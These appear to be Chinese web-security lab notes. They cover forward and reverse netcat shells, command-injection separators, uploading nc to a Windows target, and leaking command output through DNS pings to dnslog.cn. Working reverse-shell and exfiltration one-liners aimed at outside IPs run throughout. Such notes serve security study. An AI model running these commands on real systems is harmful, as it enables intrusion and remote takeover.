web安全学习笔记【05】——反弹Shell、正反向连接

思维导图

#知识点:

1、Web常规-系统&中间件&数据库&源码等

2、Web其他-前后端&软件&Docker&分配站等

3、Web拓展-CDN&WAF&OSS&反向&负载均衡等

-----------------------------------

1、APP架构-封装&原生态&H5&flutter等

2、小程序架构-Web&H5&JS&VUE框架等

-----------------------------------

1、渗透命令-常规命令&文件上传下载

2、反弹Shell-防火墙策略&正反向连接

3、数据回显-查询带外&网络协议层级

#章节点

应用架构:Web/APP/云应用/小程序/负载均衡等

安全产品:CDN/WAF/IDS/IPS/蜜罐/防火墙/杀毒等

渗透命令:文件上传下载/端口服务/Shell反弹等

抓包技术:HTTP/TCP/UDP/ICMP/DNS/封包/代理等

算法加密:数据编码/密码算法/密码保护/反编译/加壳等

web安全学习笔记【05】——反弹Shell、正反向连接_第1张图片web安全学习笔记【05】——反弹Shell、正反向连接_第2张图片

演示案例:

  • 实用案例1:文件上传下载-解决无图形化&解决数据传输
  • 实用案例2:反弹Shell命令-解决数据回显&解决数据通讯
  • 实际案例1:防火墙绕过-正向连接&反向连接&内网服务器
  • 实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog

#常规基本渗透命令详解

https://blog.csdn.net/weixin_43303273/article/details/83029138

#实用案例1:文件上传下载-解决无图形化&解决数据传输

命令生成:https://forum.ywhack.com/bountytips.php?download

Linux:wget curl python ruby perl java等

Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等

自己构造

web安全学习笔记【05】——反弹Shell、正反向连接_第3张图片

web安全学习笔记【05】——反弹Shell、正反向连接_第4张图片

#实用案例2:反弹Shell命令-解决数据回显&解决数据通讯

命令生成:https://forum.ywhack.com/shell.php

1、正向连接:本地监听等待对方连接

Linux控制Windows

windows上面//绑定CMD到本地5566端口(需要下载第三方工具nc)

nc -e cmd -lvp 5566(命令含义:绑定cmd给到本地端口5566)

linux上面//主动连接目标5566(nc自带)

ncat 47.122.23.131 5566

监听任意来自5566端口的

web安全学习笔记【05】——反弹Shell、正反向连接_第5张图片

web安全学习笔记【05】——反弹Shell、正反向连接_第6张图片

web安全学习笔记【05】——反弹Shell、正反向连接_第7张图片

web安全学习笔记【05】——反弹Shell、正反向连接_第8张图片

Windows控制Linux

//绑定SH到本地5566端口

ncat -e /bin/sh -lvp 5566(把/bin/sh绑定到本地的5566)

//主动连接目标5566

nc 47.94.236.117 5566

linux将/bin/sh绑定到本地的5566

web安全学习笔记【05】——反弹Shell、正反向连接_第9张图片

windows监听linux的5566

web安全学习笔记【05】——反弹Shell、正反向连接_第10张图片

2、反向连接:主动给出去,对方监听

//绑定CMD到目标5566端口

ncat -e /bin/sh 47.122.23.131 5566

//等待5566连接

nc -lvvp 5566

web安全学习笔记【05】——反弹Shell、正反向连接_第11张图片

//绑定CMD到目标5566端口

nc -e cmd 47.94.236.117 5566

//等待5566连接

ncat -lvvp 5566

web安全学习笔记【05】——反弹Shell、正反向连接_第12张图片

linux想要找到某内网环境指定某个主机,只能通过反向连接,正向连接只能找到路由的IP地址,下面对应的的服务器找不到,但如果一定要通过正向连接的话,必须知道该服务器的端口号,即端口映射。

web安全学习笔记【05】——反弹Shell、正反向连接_第13张图片

实验:通过内网服务器找linux外网服务器

win10:内网ip:192.168.X.107   外网ip:171.X.X.52

外网linux:47.X.X.117

linux控制window

1、正向连接

不在同一个局域网下,主动找找不到107这个内网服务器

连接外网52也连不上是因为52是路由地址,路由地址并没有执行监听的操作

web安全学习笔记【05】——反弹Shell、正反向连接_第14张图片

2、反向连接

web安全学习笔记【05】——反弹Shell、正反向连接_第15张图片

windows控制linux

正向连接

web安全学习笔记【05】——反弹Shell、正反向连接_第16张图片

#实际案例1:防火墙绕过-正向连接&反向连接&内网服务器

管道符:| (管道符号) ||(逻辑或) &&(逻辑与)  &(后台任务符号)

Windows->| & || &&

Linux->; | || & && ``(特有``和;)

例子:

ping -c 1 127.0.0.1 ; whoami

ping -c 1 127.0.0.1 | whoami

ping -c 1 127.0.0.1 || whoami

ping -c 1 127.0.0.1 & whoami

ping -c 1 127.0.0.1 && whoami

ping -c 1 127.0.0.1 `whoami`

linux:

管道符| 执行后面的命令   ||两个命令都执行

web安全学习笔记【05】——反弹Shell、正反向连接_第17张图片

加反撇号

 web安全学习笔记【05】——反弹Shell、正反向连接_第18张图片

加;  ping报错 但是woami被执行

web安全学习笔记【05】——反弹Shell、正反向连接_第19张图片

windows:(没有;和反撇号)

web安全学习笔记【05】——反弹Shell、正反向连接_第20张图片

思考如何将输出的命令反弹到自己电脑上

1、判断windows(执行命令后权限是administrator)

web安全学习笔记【05】——反弹Shell、正反向连接_第21张图片

2、windows没有自带的nc(需要上传nc安装nc)

3、想办法上传nc 反弹权限(小迪这里准备好了nc地址 放在自己服务器上面的。由于对方是windows服务器,所以棱角生成的命令对应选择windows的)

执行之后查看windows 已经有nc.exe

web安全学习笔记【05】——反弹Shell、正反向连接_第22张图片

4、反弹

web安全学习笔记【05】——反弹Shell、正反向连接_第23张图片

开启入站策略,采用反向连接

入站不行只能给出去

web安全学习笔记【05】——反弹Shell、正反向连接_第24张图片

Linux:ncat -lvvp 5566

Windows:127.0.0.1 | nc -e cmd 47.94.236.117 5566

开启出站策略,采用正向连接

但是一般防火墙入站没有允许5566通信的话 也连接不上 (出战一般是允许的)

web安全学习笔记【05】——反弹Shell、正反向连接_第25张图片

Linux:ncat -e cmd 47.122.23.131 5566

Windows:127.0.0.1 | nc -e cmd -lvvp 5566

正反向反弹案例-内网服务器

只能内网主动交出数据,反向连接

#实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog

web安全学习笔记【05】——反弹Shell、正反向连接_第26张图片

出站入站都开启策略(数据不回显):OSI网络七层

127.0.0.1 | powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.f4an93.dnslog.cn';$z=$x+$y;ping $z

漏洞有,但是数据不回显:

1、反弹shell

2、带外查询

dnslog——反撇号命令(linux可以 但是windows不识别反撇号命令)

web安全学习笔记【05】——反弹Shell、正反向连接_第27张图片

web安全学习笔记【05】——反弹Shell、正反向连接_第28张图片

确定能执行命令

windows

` ` ;

ping 127.0.0.1 |

为什么要这样写

cmd无法执行whoami

用到powershell变量赋值 把whoami执行结果给变量

web安全学习笔记【05】——反弹Shell、正反向连接_第29张图片

此时dnslog还是无法回显 (因为\  所以将\用xxxx替换掉)

web安全学习笔记【05】——反弹Shell、正反向连接_第30张图片

web安全学习笔记【05】——反弹Shell、正反向连接_第31张图片

结果带有“\” 导致ping无法执行

powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z

127.0.0.1 | powershell $x=ver;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z

你可能感兴趣的:(学习笔记,web安全,linux,学习,笔记)